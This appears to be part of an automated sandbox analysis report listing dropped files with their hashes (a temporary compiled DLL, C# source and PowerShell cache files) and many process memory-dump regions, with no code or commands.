- C:\Windows\TEMP\rx3ve1h3\rx3ve1h3.dll
  MD5 4055b805268424b982cb119496fd42b4
  SHA1 0f7b9d4e30fe5711dc9c830feed7a13e4ab683da
  SHA256 e11f171a9deeed74afe2c09ac490edc613df1d3206539d0925fb0b5111543589
  SHA512 0be640ce0c657560c38f97f41ac0b3a38c3ec7b9feca1bb6fe9700aedcc0b4dc225f7e4edb2e04a1912e0bebb2330957be870583721e1ca60b2494c53d9a8c19
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5 5f5aa607657efd596f2ba27625bb7ed4
  SHA1 6818e799afcb486fa9416eb29468c10f7a051d88
  SHA256 f5a8fbb9d69c35df83b4721a580777a6d7f748965b8db902257a73a2d48b787b
  SHA512 0b6d87751aaa6da840f932e718d1444e0b7d033f3eecfac988a9b9e4266370d852d7a5f28d65526968807fe56018902c0a6c1ac876a276efce876aebb57fa93b
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5 fbee00510eb47c7fb0a7771e53a0f185
  SHA1 ccfb5ed960451945bb293ad6ec7b42438f0d8cfd
  SHA256 6c73b617fd2e57baf3955d7b4842190ab1ce1112c029c0ce6463783deb0d1ff5
  SHA512 a85344fce4a41244852b4a04f04945cd20f26d88120e97c1abd672ab4b6aae359c18d9e1d0bea41e22fa63c19c2d7981ef65b5f893e0f447259d8dc03f371787
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5 f92bbe1907577f64bb8099b63bb7bbf3
  SHA1 88bd6b9782e457741dadb7d9101de21336cbece9
  SHA256 a05e6d139f22b5a4435bb3412836c2cc1e970d6f3e9919a8bc6f1a21d147d02c
  SHA512 32b562a4d4a46615c095abe4a8e5fc8b6f607850a04ce7e71de97a9e5c4c3bd0a1f0c93d306ebd353a507be0c341d777a7e623178bc03d71218365929c789be3
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5 0d6cf36fd1365f5e0f3613e036e67b08
  SHA1 a69cfe08860abf74eeb3061de7e94e078f0e7476
  SHA256 34be5be9fb158824e365d0e8a45624d8becaaeb7ad89f41d260593324f6b9231
  SHA512 aa1c7479e4fc4e4bde3dcd905cafb4f220662a2fc5e295fe9afe6b83b37f5149cffd973291cf619f4c008418a007685e3e2f2188a758a0fcf302a0549eee6f8d
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5 0f9ce9a5d0a320223c80462d2e228bc7
  SHA1 7bbeda6d81d00592083f7e7943912d8e824c92fd
  SHA256 887664b1cd8013d5c4917e6a4e1b295e9bc9d15f57eeb8d06801b548e48c42fa
  SHA512 45aadffdff25de5a7c02a26637c820761d4e0a0f5b4f5ff88778094df9a72f0f97ae301c59b3f5c780bd1d263b6cd9069c0f50b410f58a8d9783a0b9a4a61676
- \??\c:\Windows\Temp\rx3ve1h3\CSC7F4257F2AD9C4DEDBEA0412255FCB45.TMP
  MD5 6d9ebf10bcdb945a4914038e331fc27d
  SHA1 7d4acb14a10a166d02fd8645a33356940f629df5
  SHA256 96c3a2f4c04daf110fd6912179676b72a34b37b69a79346d7f4547b890845920
  SHA512 1bed2b0a0fa08e8275a25e2af5bcc9d5ed6ace411dda3363568da869ff86bbb330db10aaf24e67ffc29c9791c52d5dcfd56e324888e7e4464922b60669cbc4c6
- \??\c:\Windows\Temp\rx3ve1h3\rx3ve1h3.0.cs
  MD5 a3d53d439e4e86639f5906a98406c007
  SHA1 35a6bc37eaf0b5c644a080f1e3281d880514473d
  SHA256 25ef21a1ac4c1bce799bb86569354494fb374a4c0e356a2af64cf99edfea7d49
  SHA512 edd8785b0b001f1ee9d1314b4b16efa34471d6034a44d73173b87793037a137edd603a73cf471e852d49d94b8eedc7c53115d29a1064d911a096ffb5c56fe180
- \??\c:\Windows\Temp\rx3ve1h3\rx3ve1h3.cmdline
  MD5 c6e6c0158a4308cba1963d576d03716c
  SHA1 d5f2465dd9322e302237724e0b27fd45cdbae2d9
  SHA256 c7fe77fb743f3b3919e34dbb75935a0c76431b586cfa34e924325751d3cf35c5
  SHA512 9152fefabdc4dfc13311cf78c0c1f3f32837804d4ad173b8478cffe7241fdc0f251efd89477d833be27af10442ca2a9284c8dc11ac43f2a263014e6dea86b991
- memory/68-27-0x0000000000000000-mapping.dmp
- memory/200-11-0x0000000000000000-mapping.dmp
- memory/644-143-0x0000000000000000-mapping.dmp
- memory/652-147-0x0000000000000000-mapping.dmp
- memory/756-142-0x0000000000000000-mapping.dmp
- memory/800-146-0x0000000000000000-mapping.dmp
- memory/856-2-0x0000000000000000-mapping.dmp
- memory/1032-150-0x0000000000000000-mapping.dmp
- memory/1136-149-0x0000000000000000-mapping.dmp
- memory/1264-26-0x0000000000000000-mapping.dmp
- memory/1264-123-0x0000000000000000-mapping.dmp
- memory/1512-3-0x0000000000000000-mapping.dmp
- memory/1540-12-0x0000024FC6AC8000-0x0000024FC6ACA000-memory.dmp (Filesize 8KB)
- memory/1540-10-0x0000024FC6AC6000-0x0000024FC6AC8000-memory.dmp (Filesize 8KB)
- memory/1540-112-0x0000024FC6ACA000-0x0000024FC6ACF000-memory.dmp (Filesize 20KB)
- memory/1540-9-0x0000024FC9660000-0x0000024FC9661000-memory.dmp (Filesize 4KB)
- memory/1540-8-0x0000024FC6A20000-0x0000024FC6A21000-memory.dmp (Filesize 4KB)
- memory/1540-6-0x0000024FC6AC0000-0x0000024FC6AC2000-memory.dmp (Filesize 8KB)
- memory/1540-7-0x0000024FC6AC3000-0x0000024FC6AC5000-memory.dmp (Filesize 8KB)
- memory/1540-5-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmp (Filesize 9.9MB)
- memory/1540-4-0x0000000000000000-mapping.dmp
- memory/1740-144-0x0000000000000000-mapping.dmp
- memory/2068-152-0x0000000000000000-mapping.dmp
- memory/2112-25-0x0000000000000000-mapping.dmp
- memory/2132-33-0x0000000000000000-mapping.dmp
- memory/2156-113-0x0000000000000000-mapping.dmp
- memory/2188-140-0x0000000000000000-mapping.dmp
- memory/2200-34-0x0000000000000000-mapping.dmp
- memory/2200-111-0x0000000000000000-mapping.dmp
- memory/2696-90-0x0000000000000000-mapping.dmp
- memory/2696-28-0x0000000000000000-mapping.dmp
- memory/2748-64-0x000001E8438B0000-0x000001E8438B1000-memory.dmp (Filesize 4KB)
- memory/2844-132-0x0000000000000000-mapping.dmp
- memory/2964-21-0x0000000000000000-mapping.dmp
- memory/2988-35-0x0000000000000000-mapping.dmp
- memory/3116-17-0x000001673CF73000-0x000001673CF75000-memory.dmp (Filesize 8KB)
- memory/3116-18-0x000001673CF20000-0x000001673CF21000-memory.dmp (Filesize 4KB)
- memory/3116-16-0x000001673CF70000-0x000001673CF72000-memory.dmp (Filesize 8KB)
- mem"memory/3116-20-0x000001673CF76000-0x000001673CF78000-memory.dmp (Filesize 8KB)
- memory/3116-14-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmp (Filesize 9.9MB)
- memory/3116-13-0x0000000000000000-mapping.dmp
- memory/3200-22-0x0000000000000000-mapping.dmp
- memory/3244-114-0x0000000000000000-mapping.dmp
- memory/3364-23-0x0000000000000000-mapping.dmp
- memory/3364-36-0x0000000000000000-mapping.dmp
- memory/3436-141-0x0000000000000000-mapping.dmp
- memory/3444-31-0x0000000000000000-mapping.dmp
- memory/3484-29-0x0000000000000000-mapping.dmp
- memory/3568-110-0x0000000000000000-mapping.dmp
- memory/3660-135-0x0000000000000000-mapping.dmp
- memory/3700-32-0x0000000000000000-mapping.dmp
- memory/3700-119-0x0000000000000000-mapping.dmp
- memory/3768-24-0x0000000000000000-mapping.dmp
- memory/3780-108-0x0000000000000000-mapping.dmp
- memory/4056-30-0x0000000000000000-mapping.dmp
- memory/4136-37-0x0000000000000000-mapping.dmp
- memory/4148-151-0x0000000000000000-mapping.dmp
- memory/4264-145-0x0000000000000000-mapping.dmp
- memory/4340-38-0x0000000000000000-mapping.dmp
- memory/4360-39-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmp (Filesize 9.9MB)
- memory/4360-41-0x00000255CF110000-0x00000255CF112000-memory.dmp (Filesize 8KB)
- memory/4360-42-0x00000255CF113000-0x00000255CF115000-memory.dmp (Filesize 8KB)
- memory/4360-44-0x00000255CF116000-0x00000255CF118000-memory.dmp (Filesize 8KB)
- memory/4416-117-0x0000000000000000-mapping.dmp
- memory/4444-148-0x0000000000000000-mapping.dmp
- memory/4460-154-0x0000000000000000-mapping.dmp
- memory/4524-121-0x0000000000000000-mapping.dmp
- memory/4532-131-0x000001FC383A6000-0x000001FC383A8000-memory.dmp (Filesize 8KB)
- memory/4532-127-0x000001FC383A3000-0x000001FC383A5000-memory.dmp (Filesize 8KB)
- memory/4532-126-0x000001FC383A0000-0x000001FC383A2000-memory.dmp (Filesize 8KB)
- memory/4532-125-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmp (Filesize 9.9MB)
- memory/4560-74-0x0000000000000000-mapping.dmp
- memory/4608-75-0x0000000000000000-mapping.dmp
- memory/4620-56-0x0000000000000000-mapping.dmp
- memory/4632-76-0x0000000000000000-mapping.dmp
- memory/4728-77-0x0000000000000000-mapping.dmp
- memory/4732-82-0x00000241F1210000-0x00000241F1212000-memory.dmp (Filesize 8KB)
- memory/4732-78-0x0000000000000000-mapping.dmp
- memory/4732-83-0x00000241F1213000-0x00000241F1215000-memory.dmp (Filesize 8KB)
- memory/4732-105-0x00000241F1216000-0x00000241F1218000-memory.dmp (Filesize 8KB)
- memory/4732-80-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmp (Filesize 9.9MB)
- memory/4764-81-0x0000000000000000-mapping.dmp
- memory/4820-45-0x0000000000000000-mapping.dmp
- memory/4844-124-0x000001ECB3DE8000-0x000001ECB3DE9000-memory.dmp (Filesize 4KB)
- memory/4844-106-0x000001ECB3DE6000-0x000001ECB3DE8000-memory.dmp (Filesize 8KB)
- memory/4844-86-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmp (Filesize 9.9MB)
- memory/4844-88-0x000001ECB3DE0000-0x000001ECB3DE2000-memory.dmp (Filesize 8KB)
- memory/4844-84-0x0000000000000000-mapping.dmp
- memory/4844-89-0x000001ECB3DE3000-0x000001ECB3DE5000-memory.dmp (Filesize 8KB)
- memory/4844-156-0x000001ECB6B30000-0x000001ECB6B50000-memory.dmp (Filesize 128KB)
- memory/4844-155-0x000001ECB3DE9000-0x000001ECB3DEF000-memory.dmp (Filesize 24KB)
- memory/4928-115-0x0000000000000000-mapping.dmp
- memory/4932-46-0x000001FC32CB0000-0x000001FC32CB1000-memory.dmp (Filesize 4KB)
- memory/4932-47-0x000001FC32CB0000-0x000001FC32CB1000-memory.dmp (Filesize 4KB)
- memory/4956-57-0x0000000000000000-mapping.dmp
- memory/4976-58-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmp (Filesize 9.9MB)
- memory/4976-59-0x00000228D8EB0000-0x00000228D8EB2000-memory.dmp (Filesize 8KB)
- memory/4976-60-0x00000228D8EB3000-0x00000228D8EB5000-memory.dmp (Filesize 8KB)
- memory/4976-63-0x00000228D8EB6000-0x00000228D8EB8000-memory.dmp (Filesize 8KB)
- memory/4984-120-0x0000000000000000-mapping.dmp
- memory/5016-139-0x00000173DD110000-0x00000173DD111000-memory.dmp (Filesize 4KB)
- memory/5016-100-0x00000173F56E3000-0x00000173F56E5000-memory.dmp (Filesize 8KB)
- memory/5016-93-0x0000000000000000-mapping.dmp
- memory/5016-97-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmp (Filesize 9.9MB)
- memory/5016-98-0x00000173F56E0000-0x00000173F56E2000-memory.dmp (Filesize 8KB)
- memory/5016-107-0x00000173F56E6000-0x00000173F56E8000-memory.dmp (Filesize 8KB)
- memory/5052-49-0x0000000000000000-mapping.dmp
- memory/5072-53-0x0000019623A13000-0x0000019623A15000-memory.dmp (Filesize 8KB)
- memory/5072-55-0x0000019623A16000-0x0000019623A18000-memory.dmp (Filesize 8KB)
- memory/5072-65-0x000001963EED0000-0x000001963EED1000-memory.dmp (Filesize 4KB)
- memory/5072-51-0x0000019623A10000-0x0000019623A12000-memory.dmp (Filesize 8KB)
- memory/5072-50-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmp (Filesize 9.9MB)
- memory/5072-72-0x0000019623A18000-0x0000019623A19000-memory.dmp (Filesize 4KB)
- memory/5072-73-0x0000019623A19000-0x0000019623A1F000-memory.dmp (Filesize 24KB)
- memory/5072-71-0x00007FF7D9220000-0x00007FF7D9221000-memory.dmp (Filesize 4KB)
- memory/5072-70-0x000001963E8C0000-0x000001963E8C1000-memory.dmp (Filesize 4KB)
- memory/5072-69-0x000001963E7F0000-0x000001963E7F1000-memory.dmp (Filesize 4KB)
- memory/5072-68-0x000001963E750000-0x000001963E751000-memory.dmp (Filesize 4KB)